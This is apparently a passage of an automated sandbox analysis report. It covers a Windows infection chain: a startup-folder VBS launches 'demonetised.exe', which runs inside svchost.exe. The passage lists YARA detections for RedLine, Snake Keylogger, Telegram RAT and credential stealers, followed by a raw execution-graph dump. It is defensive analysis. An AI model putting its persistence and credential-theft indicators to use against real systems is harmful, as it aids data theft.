                                                                                                                Has exited:false

                                                                                                                Target ID:4
                                                                                                                Start time:09:33:49
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbs"
                                                                                                                Imagebase:0x7ff78dc90000
                                                                                                                File size:170'496 bytes
                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:09:33:49
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Users\user\AppData\Local\inhumate\demonetised.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                                                                                                                Imagebase:0xd20000
                                                                                                                File size:649'216 bytes
                                                                                                                MD5 hash:80A64F0B8DF55D637E135F0EB4FB6B70
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.2206920824.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:09:33:51
                                                                                                                Start date:10/01/2025
                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Local\inhumate\demonetised.exe"
                                                                                                                Imagebase:0x930000
                                                                                                                File size:46'504 bytes
                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4530339736.0000000007740000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.4522419092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4527614360.0000000006223000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4525232764.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4523925353.0000000003174000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000003.2206433345.000000000305D000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000006.00000002.4531521488.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: false

Execution Graph

Execution Coverage: 3.8%
Dynamic/Decrypted Code Coverage: 0.4%
Signature Coverage: 11.2%
Total number of Nodes: 2000
Total number of Limit Nodes: 59
94951->94952 94955 e0388e 94952->94955 94976 e07c0e 47 API calls __getptd_noexit 94953->94976 94962 e0365b 94955->94962 94956 e03875 94977 e06e10 8 API calls __wopenfile 94956->94977 94961->94948 94964 e03676 _memset 94962->94964 94969 e03691 94962->94969 94963 e03681 95070 e07c0e 47 API calls __getptd_noexit 94963->95070 94964->94963 94964->94969 94971 e036cf 94964->94971 94966 e03686 95071 e06e10 8 API calls __wopenfile 94966->95071 94978 e038c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 94969->94978 94970 e037e0 _memset 95073 e07c0e 47 API calls __getptd_noexit 94970->95073 94971->94969 94971->94970 94973 e02933 __stbuf 47 API calls 94971->94973 94979 e0ee0e 94971->94979 95050 e0eb66 94971->95050 95072 e0ec87 47 API calls 4 library calls 94971->95072 94973->94971 94976->94956 94977->94961 94978->94961 94980 e0ee46 94979->94980 94981 e0ee2f 94979->94981 94983 e0f57e 94980->94983 94986 e0ee80 94980->94986 94982 e07bda __dosmaperr 47 API calls 94981->94982 94985 e0ee34 94982->94985 94984 e07bda __dosmaperr 47 API calls 94983->94984 94987 e0f583 94984->94987 94988 e07c0e __dosmaperr 47 API calls 94985->94988 94989 e0ee88 94986->94989 94997 e0ee9f 94986->94997 94990 e07c0e __dosmaperr 47 API calls 94987->94990 94993 e0ee3b 94988->94993 94991 e07bda __dosmaperr 47 API calls 94989->94991 94992 e0ee94 94990->94992 94994 e0ee8d 94991->94994 94995 e06e10 __wopenfile 8 API calls 94992->94995 94993->94971 94998 e07c0e __dosmaperr 47 API calls 94994->94998 94995->94993 94996 e0eeb4 94999 e07bda __dosmaperr 47 API calls 94996->94999 94997->94993 94997->94996 95000 e0eece 94997->95000 95001 e0eeec 94997->95001 94998->94992 94999->94994 95000->94996 95004 e0eed9 95000->95004 95003 e069d0 __malloc_crt 47 API calls 95001->95003 95005 e0eefc 95003->95005 95006 e13bf2 __stbuf 47 API calls 95004->95006 95007 e0ef04 95005->95007 95008 e0ef1f 95005->95008 95009 e0efed 95006->95009 95010 e07c0e __dosmaperr 47 API calls 95007->95010 95012 e0f82f __lseeki64_nolock 49 API 
calls 95008->95012 95011 e0f066 ReadFile 95009->95011 95016 e0f003 GetConsoleMode 95009->95016 95013 e0ef09 95010->95013 95014 e0f546 GetLastError 95011->95014 95015 e0f088 95011->95015 95017 e0ef2d 95012->95017 95018 e07bda __dosmaperr 47 API calls 95013->95018 95019 e0f553 95014->95019 95020 e0f046 95014->95020 95015->95014 95026 e0f058 95015->95026 95021 e0f063 95016->95021 95022 e0f017 95016->95022 95017->95004 95024 e0ef14 95018->95024 95025 e07c0e __dosmaperr 47 API calls 95019->95025 95028 e07bed __dosmaperr 47 API calls 95020->95028 95035 e0f04c 95020->95035 95021->95011 95022->95021 95023 e0f01d ReadConsoleW 95022->95023 95023->95026 95027 e0f040 GetLastError 95023->95027 95024->94993 95029 e0f558 95025->95029 95032 e0f0bd 95026->95032 95026->95035 95040 e0f32a 95026->95040 95027->95020 95028->95035 95030 e07bda __dosmaperr 47 API calls 95029->95030 95030->95035 95031 e01c9d _free 47 API calls 95031->94993 95034 e0f129 ReadFile 95032->95034 95042 e0f1aa 95032->95042 95036 e0f14a GetLastError 95034->95036 95048 e0f154 95034->95048 95035->94993 95035->95031 95036->95048 95037 e0f267 95044 e0f217 MultiByteToWideChar 95037->95044 95045 e0f82f __lseeki64_nolock 49 API calls 95037->95045 95038 e0f257 95043 e07c0e __dosmaperr 47 API calls 95038->95043 95039 e0f430 ReadFile 95041 e0f453 GetLastError 95039->95041 95049 e0f461 95039->95049 95040->95035 95040->95039 95041->95049 95042->95035 95042->95037 95042->95038 95042->95044 95043->95035 95044->95027 95044->95035 95045->95044 95046 e0f82f __lseeki64_nolock 49 API calls 95046->95048 95047 e0f82f __lseeki64_nolock 49 API calls 95047->95049 95048->95032 95048->95046 95049->95040 95049->95047 95051 e0eb71 95050->95051 95054 e0eb86 95050->95054 95052 e07c0e __dosmaperr 47 API calls 95051->95052 95053 e0eb76 95052->95053 95055 e06e10 __wopenfile 8 API calls 95053->95055 95056 e0ebbb 95054->95056 95057 e13e24 __getbuf 47 API calls 95054->95057 95064 e0eb81 95054->95064 95055->95064 95058 e02933 __stbuf 47 API calls 
95056->95058 95057->95056 95059 e0ebcf 95058->95059 95060 e0ed06 __filbuf 62 API calls 95059->95060 95061 e0ebd6 95060->95061 95062 e02933 __stbuf 47 API calls 95061->95062 95061->95064 95063 e0ebf9 95062->95063 95063->95064 95065 e02933 __stbuf 47 API calls 95063->95065 95064->94971 95066 e0ec05 95065->95066 95066->95064 95067 e02933 __stbuf 47 API calls 95066->95067 95068 e0ec12 95067->95068 95069 e02933 __stbuf 47 API calls 95068->95069 95069->95064 95070->94966 95071->94969 95072->94971 95073->94966 95077 e0344a GetSystemTimeAsFileTime 95074->95077 95076 e2bdc3 95076->94813 95078 e03478 __aulldiv 95077->95078 95078->95076 95080 e03e71 _flsall 95079->95080 95081 e03e94 95080->95081 95082 e03e7f 95080->95082 95083 e04e1c __lock_file 48 API calls 95081->95083 95093 e07c0e 47 API calls __getptd_noexit 95082->95093 95086 e03e9a 95083->95086 95085 e03e84 95094 e06e10 8 API calls __wopenfile 95085->95094 95095 e03b0c 55 API calls 6 library calls 95086->95095 95089 e03ea5 95096 e03ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 95089->95096 95091 e03eb7 95092 e03e8f _flsall 95091->95092 95092->94818 95093->95085 95094->95092 95095->95089 95096->95091 95098 e01e61 95097->95098 95101 e01e55 95097->95101 95121 e07c0e 47 API calls __getptd_noexit 95098->95121 95100 e02019 95105 e01e41 95100->95105 95122 e06e10 8 API calls __wopenfile 95100->95122 95101->95098 95111 e01ed4 95101->95111 95116 e09d6b 47 API calls 2 library calls 95101->95116 95104 e01fa0 95104->95098 95104->95105 95107 e01fb0 95104->95107 95105->94276 95106 e01f5f 95106->95098 95108 e01f7b 95106->95108 95118 e09d6b 47 API calls 2 library calls 95106->95118 95120 e09d6b 47 API calls 2 library calls 95107->95120 95108->95098 95108->95105 95110 e01f91 95108->95110 95119 e09d6b 47 API calls 2 library calls 95110->95119 95111->95098 95115 e01f41 95111->95115 95117 e09d6b 47 API calls 2 library calls 95111->95117 95115->95104 95115->95106 95116->95111 95117->95115 95118->95108 95119->95105 95120->95105 
95121->95100 95122->95105 95145 e2c581 __tzset_nolock _wcscmp 95140->95145 95141 de44ed 64 API calls 95141->95145 95142 e2c05f 95142->94725 95142->94727 95143 e2bf5a GetSystemTimeAsFileTime 95143->95145 95144 de4517 83 API calls 95144->95145 95145->95141 95145->95142 95145->95143 95145->95144 95266 de6b0f 95237->95266 95239 deb69b 95278 deba85 95239->95278 95241 deb6b5 Mailbox 95241->94300 95244 deba85 48 API calls 95257 deb495 95244->95257 95245 e5397b 95292 e226bc 88 API calls 4 library calls 95245->95292 95246 deb9e4 95293 e226bc 88 API calls 4 library calls 95246->95293 95249 e53973 95249->95241 95252 e53989 95254 deba85 48 API calls 95252->95254 95253 debcce 48 API calls 95253->95257 95254->95249 95255 e53909 95288 de6b4a 95255->95288 95257->95239 95257->95244 95257->95245 95257->95246 95257->95253 95257->95255 95261 debdfa 48 API calls 95257->95261 95264 e53939 ___crtGetEnvironmentStringsW 95257->95264 95271 dec413 59 API calls 95257->95271 95272 debb85 95257->95272 95277 debc74 48 API calls 95257->95277 95286 dec6a5 49 API calls 95257->95286 95287 dec799 48 API calls ___crtGetEnvironmentStringsW 95257->95287 95259 e53914 95263 dff4ea 48 API calls 95259->95263 95262 deb66c CharUpperBuffW 95261->95262 95262->95257 95263->95264 95291 e226bc 88 API calls 4 library calls 95264->95291 95265->94304 95267 dff4ea 48 API calls 95266->95267 95268 de6b34 95267->95268 95269 de6b4a 48 API calls 95268->95269 95270 de6b43 95269->95270 95270->95257 95271->95257 95273 debb9b 95272->95273 95276 debb96 ___crtGetEnvironmentStringsW 95272->95276 95274 dfee75 48 API calls 95273->95274 95275 e51b77 95273->95275 95274->95276 95276->95257 95277->95257 95279 debb25 95278->95279 95282 deba98 ___crtGetEnvironmentStringsW 95278->95282 95281 dff4ea 48 API calls 95279->95281 95280 dff4ea 48 API calls 95284 deba9f 95280->95284 95281->95282 95282->95280 95283 debac8 95283->95241 95284->95283 95285 dff4ea 48 API calls 95284->95285 95285->95283 95286->95257 95287->95257 95289 dff4ea 48 API 
calls 95288->95289 95290 de6b54 95289->95290 95290->95259 95291->95249 95292->95252 95293->95249 95294->94325 95295->94311 95296->94319 95297->94322 95298->94328 95299->94338 95300->94340 95301->94344 95302->94023 95303->94023 95304->94025 95305->94025 95306->94017 95307->94013 95308->94026 95309->94038 95310->94038 95311->94039 95312->94055 95313->94061 95314 e519dd 95319 de4a30 95314->95319 95316 e519f1 95339 e00f0a 52 API calls __cinit 95316->95339 95318 e519fb 95320 de4a40 __ftell_nolock 95319->95320 95321 ded7f7 48 API calls 95320->95321 95322 de4af6 95321->95322 95340 de5374 95322->95340 95324 de4aff 95347 de363c 95324->95347 95331 ded7f7 48 API calls 95332 de4b32 95331->95332 95369 de49fb 95332->95369 95334 de4b3d _wcscat Mailbox __wsetenvp 95335 de4b43 Mailbox 95334->95335 95336 de61a6 48 API calls 95334->95336 95337 dece19 48 API calls 95334->95337 95338 de64cf 48 API calls 95334->95338 95335->95316 95336->95334 95337->95334 95338->95334 95339->95318 95383 e0f8a0 95340->95383 95343 dece19 48 API calls 95344 de53a7 95343->95344 95385 de660f 95344->95385 95346 de53b1 Mailbox 95346->95324 95348 de3649 __ftell_nolock 95347->95348 95412 de366c GetFullPathNameW 95348->95412 95350 de365a 95351 de6a63 48 API calls 95350->95351 95352 de3669 95351->95352 95353 de518c 95352->95353 95354 de5197 95353->95354 95355 de519f 95354->95355 95356 e51ace 95354->95356 95414 de5130 95355->95414 95358 de6b4a 48 API calls 95356->95358 95360 e51adb __wsetenvp 95358->95360 95359 de4b18 95363 de64cf 95359->95363 95361 dfee75 48 API calls 95360->95361 95362 e51b07 ___crtGetEnvironmentStringsW 95361->95362 95364 de651b 95363->95364 95368 de64dd ___crtGetEnvironmentStringsW 95363->95368 95366 dff4ea 48 API calls 95364->95366 95365 dff4ea 48 API calls 95367 de4b29 95365->95367 95366->95368 95367->95331 95368->95365 95424 debcce 95369->95424 95372 de4a2b 95372->95334 95373 e541cc RegQueryValueExW 95374 e541e5 95373->95374 95375 e54246 RegCloseKey 95373->95375 95376 dff4ea 48 API calls 
95374->95376 95377 e541fe 95376->95377 95378 de47b7 48 API calls 95377->95378 95379 e54208 RegQueryValueExW 95378->95379 95380 e54224 95379->95380 95381 e5423b 95379->95381 95382 de6a63 48 API calls 95380->95382 95381->95375 95382->95381 95384 de5381 GetModuleFileNameW 95383->95384 95384->95343 95386 e0f8a0 __ftell_nolock 95385->95386 95387 de661c GetFullPathNameW 95386->95387 95392 de6a63 95387->95392 95389 de6643 95403 de6571 95389->95403 95393 de6adf 95392->95393 95395 de6a6f __wsetenvp 95392->95395 95408 deb18b 95393->95408 95396 de6a8b 95395->95396 95397 de6ad7 95395->95397 95398 de6b4a 48 API calls 95396->95398 95407 dec369 48 API calls 95397->95407 95400 de6a95 95398->95400 95401 dfee75 48 API calls 95400->95401 95402 de6ab6 ___crtGetEnvironmentStringsW 95401->95402 95402->95389 95404 de657f 95403->95404 95405 deb18b 48 API calls 95404->95405 95406 de658f 95405->95406 95406->95346 95407->95402 95409 deb199 95408->95409 95411 deb1a2 ___crtGetEnvironmentStringsW 95408->95411 95410 debdfa 48 API calls 95409->95410 95409->95411 95410->95411 95411->95402 95413 de368a 95412->95413 95413->95350 95415 de513f __wsetenvp 95414->95415 95416 e51b27 95415->95416 95417 de5151 95415->95417 95419 de6b4a 48 API calls 95416->95419 95418 debb85 48 API calls 95417->95418 95420 de515e ___crtGetEnvironmentStringsW 95418->95420 95421 e51b34 95419->95421 95420->95359 95422 dfee75 48 API calls 95421->95422 95423 e51b57 ___crtGetEnvironmentStringsW 95422->95423 95425 de4a0a RegOpenKeyExW 95424->95425 95426 debce8 95424->95426 95425->95372 95425->95373 95427 dff4ea 48 API calls 95426->95427 95428 debcf2 95427->95428 95429 dfee75 48 API calls 95428->95429 95429->95425 95430 e59bec 95465 df0ae0 Mailbox ___crtGetEnvironmentStringsW 95430->95465 95434 df0509 95530 e2cc5c 86 API calls 4 library calls 95434->95530 95435 df146e 95441 de6eed 48 API calls 95435->95441 95438 de6eed 48 API calls 95456 defec8 95438->95456 95440 dff4ea 48 API calls 95440->95456 95459 deffe1 Mailbox 95441->95459 
95443 df1473 95529 e2cc5c 86 API calls 4 library calls 95443->95529 95444 e5a246 95448 de6eed 48 API calls 95444->95448 95445 e5a922 95448->95459 95449 e5a873 95450 ded7f7 48 API calls 95450->95456 95451 e5a30e 95451->95459 95525 e197ed InterlockedDecrement 95451->95525 95452 dece19 48 API calls 95452->95465 95453 e00f0a 52 API calls __cinit 95453->95456 95454 e197ed InterlockedDecrement 95454->95456 95456->95434 95456->95435 95456->95438 95456->95440 95456->95443 95456->95444 95456->95450 95456->95451 95456->95453 95456->95454 95457 e5a973 95456->95457 95456->95459 95461 df15b5 95456->95461 95522 df1820 335 API calls 2 library calls 95456->95522 95523 df1d10 59 API calls Mailbox 95456->95523 95531 e2cc5c 86 API calls 4 library calls 95457->95531 95460 e5a982 95528 e2cc5c 86 API calls 4 library calls 95461->95528 95462 e3e822 335 API calls 95462->95465 95463 dff4ea 48 API calls 95463->95465 95464 defe30 335 API calls 95464->95465 95465->95452 95465->95456 95465->95459 95465->95462 95465->95463 95465->95464 95466 e5a706 95465->95466 95468 df1526 Mailbox 95465->95468 95469 e197ed InterlockedDecrement 95465->95469 95470 e36ff0 335 API calls 95465->95470 95474 e40d1d 95465->95474 95477 e40d09 95465->95477 95480 e2b55b 95465->95480 95484 e3f0ac 95465->95484 95516 e2a6ef 95465->95516 95524 e3ef61 82 API calls 2 library calls 95465->95524 95526 e2cc5c 86 API calls 4 library calls 95466->95526 95527 e2cc5c 86 API calls 4 library calls 95468->95527 95469->95465 95470->95465 95532 e3f8ae 95474->95532 95476 e40d2d 95476->95465 95478 e3f8ae 129 API calls 95477->95478 95479 e40d19 95478->95479 95479->95465 95481 e2b564 95480->95481 95482 e2b569 95480->95482 95631 e2a4d5 95481->95631 95482->95465 95485 ded7f7 48 API calls 95484->95485 95486 e3f0c0 95485->95486 95487 ded7f7 48 API calls 95486->95487 95488 e3f0c8 95487->95488 95489 ded7f7 48 API calls 95488->95489 95490 e3f0d0 95489->95490 95491 de936c 81 API calls 95490->95491 95514 e3f0de 95491->95514 95492 de6a63 48 API calls 
95492->95514 95493 e3f2cc 95494 e3f2f9 Mailbox 95493->95494 95663 de6b68 48 API calls 95493->95663 95494->95465 95495 e3f2b3 95497 de518c 48 API calls 95495->95497 95501 e3f2c0 95497->95501 95498 dec799 48 API calls 95498->95514 95499 e3f2ce 95502 de518c 48 API calls 95499->95502 95500 de6eed 48 API calls 95500->95514 95654 de510d 95501->95654 95504 e3f2dd 95502->95504 95506 de510d 48 API calls 95504->95506 95505 debdfa 48 API calls 95508 e3f175 CharUpperBuffW 95505->95508 95506->95493 95507 debdfa 48 API calls 95509 e3f23a CharUpperBuffW 95507->95509 95510 ded645 53 API calls 95508->95510 95653 dfd922 55 API calls 2 library calls 95509->95653 95510->95514 95512 de936c 81 API calls 95512->95514 95513 de510d 48 API calls 95513->95514 95514->95492 95514->95493 95514->95494 95514->95495 95514->95498 95514->95499 95514->95500 95514->95505 95514->95507 95514->95512 95514->95513 95515 de518c 48 API calls 95514->95515 95515->95514 95517 e2a6fb 95516->95517 95518 dff4ea 48 API calls 95517->95518 95519 e2a709 95518->95519 95520 e2a717 95519->95520 95521 ded7f7 48 API calls 95519->95521 95520->95465 95521->95520 95522->95456 95523->95456 95524->95465 95525->95459 95526->95468 95527->95459 95528->95459 95529->95449 95530->95445 95531->95460 95533 de936c 81 API calls 95532->95533 95534 e3f8ea 95533->95534 95558 e3f92c Mailbox 95534->95558 95568 e40567 95534->95568 95536 e3fb8b 95537 e3fcfa 95536->95537 95542 e3fb95 95536->95542 95615 e40688 89 API calls Mailbox 95537->95615 95540 e3fd07 95541 e3fd13 95540->95541 95540->95542 95541->95558 95581 e3f70a 95542->95581 95543 de936c 81 API calls 95549 e3f984 Mailbox 95543->95549 95548 e3fbc9 95595 dfed18 95548->95595 95549->95536 95549->95543 95549->95558 95599 e429e8 48 API calls ___crtGetEnvironmentStringsW 95549->95599 95600 e3fda5 60 API calls 2 library calls 95549->95600 95552 e3fbe3 95601 e2cc5c 86 API calls 4 library calls 95552->95601 95553 e3fbfd 95602 dfc050 95553->95602 95556 e3fbee GetCurrentProcess TerminateProcess 
95556->95553 95557 e3fc14 95559 df1b90 48 API calls 95557->95559 95567 e3fc3e 95557->95567 95558->95476 95561 e3fc2d 95559->95561 95560 e3fd65 95560->95558 95564 e3fd7e FreeLibrary 95560->95564 95613 e4040f 105 API calls _free 95561->95613 95563 df1b90 48 API calls 95563->95567 95564->95558 95567->95560 95567->95563 95614 dedcae 50 API calls Mailbox 95567->95614 95616 e4040f 105 API calls _free 95567->95616 95569 debdfa 48 API calls 95568->95569 95570 e40582 CharLowerBuffW 95569->95570 95617 e21f11 95570->95617 95574 ded7f7 48 API calls 95575 e405bb 95574->95575 95624 de69e9 48 API calls ___crtGetEnvironmentStringsW 95575->95624 95577 e405d2 95578 deb18b 48 API calls 95577->95578 95579 e405de Mailbox 95578->95579 95580 e4061a Mailbox 95579->95580 95625 e3fda5 60 API calls 2 library calls 95579->95625 95580->95549 95582 e3f725 95581->95582 95586 e3f77a 95581->95586 95583 dff4ea 48 API calls 95582->95583 95584 e3f747 95583->95584 95585 dff4ea 48 API calls 95584->95585 95584->95586 95585->95584 95587 e40828 95586->95587 95588 e40a53 Mailbox 95587->95588 95594 e4084b _strcat _wcscpy __wsetenvp 95587->95594 95588->95548 95589 decf93 58 API calls 95589->95594 95590 ded286 48 API calls 95590->95594 95591 de936c 81 API calls 95591->95594 95592 e0395c 47 API calls _W_store_winword 95592->95594 95594->95588 95594->95589 95594->95590 95594->95591 95594->95592 95628 e28035 50 API calls __wsetenvp 95594->95628 95596 dfed2d 95595->95596 95597 dfedc5 VirtualProtect 95596->95597 95598 dfed93 95596->95598 95597->95598 95598->95552 95598->95553 95599->95549 95600->95549 95601->95556 95603 dfc064 95602->95603 95605 dfc069 Mailbox 95602->95605 95629 dfc1af 48 API calls 95603->95629 95611 dfc077 95605->95611 95630 dfc15c 48 API calls 95605->95630 95607 dff4ea 48 API calls 95609 dfc108 95607->95609 95608 dfc152 95608->95557 95610 dff4ea 48 API calls 95609->95610 95612 dfc113 95610->95612 95611->95607 95611->95608 95612->95557 95613->95567 95614->95567 95615->95540 95616->95567 95619 
e21f3b __wsetenvp 95617->95619 95618 e21f79 95618->95574 95618->95579 95619->95618 95620 e21ffa 95619->95620 95622 e21f6f 95619->95622 95620->95618 95627 dfd37a 60 API calls 95620->95627 95622->95618 95626 dfd37a 60 API calls 95622->95626 95624->95577 95625->95580 95626->95622 95627->95620 95628->95594 95629->95605 95630->95611 95632 e2a5ee 95631->95632 95633 e2a4ec 95631->95633 95632->95482 95634 e2a5d4 Mailbox 95633->95634 95636 e2a58b 95633->95636 95637 e2a4fd 95633->95637 95635 dff4ea 48 API calls 95634->95635 95650 e2a54c Mailbox ___crtGetEnvironmentStringsW 95635->95650 95638 dff4ea 48 API calls 95636->95638 95639 dff4ea 48 API calls 95637->95639 95648 e2a51a 95637->95648 95638->95650 95639->95648 95640 e2a555 95644 dff4ea 48 API calls 95640->95644 95641 e2a545 95643 dff4ea 48 API calls 95641->95643 95642 dff4ea 48 API calls 95642->95632 95643->95650 95645 e2a55b 95644->95645 95651 e29d2d 48 API calls 95645->95651 95647 e2a567 95652 dfe65e 50 API calls 95647->95652 95648->95640 95648->95641 95648->95650 95650->95642 95651->95647 95652->95650 95653->95514 95655 de511f 95654->95655 95656 e51be7 95654->95656 95664 deb384 95655->95664 95673 e1a58f 48 API calls ___crtGetEnvironmentStringsW 95656->95673 95659 e51bf1 95661 de6eed 48 API calls 95659->95661 95660 de512b 95660->95493 95662 e51bf9 Mailbox 95661->95662 95663->95494 95665 deb392 95664->95665 95672 deb3c5 ___crtGetEnvironmentStringsW 95664->95672 95666 deb3fd 95665->95666 95667 deb3b8 95665->95667 95665->95672 95668 dff4ea 48 API calls 95666->95668 95669 debb85 48 API calls 95667->95669 95670 deb407 95668->95670 95669->95672 95671 dff4ea 48 API calls 95670->95671 95671->95672 95672->95660 95673->95659 95674 10ba640 95688 10b8260 95674->95688 95676 10ba708 95691 10ba530 95676->95691 95690 10b88eb 95688->95690 95694 10bb750 GetPEB 95688->95694 95690->95676 95692 10ba539 Sleep 95691->95692 95693 10ba547 95692->95693 95694->95690 95695 de3742 95696 de374b 95695->95696 95697 de37c8 95696->95697 95698 de3769 
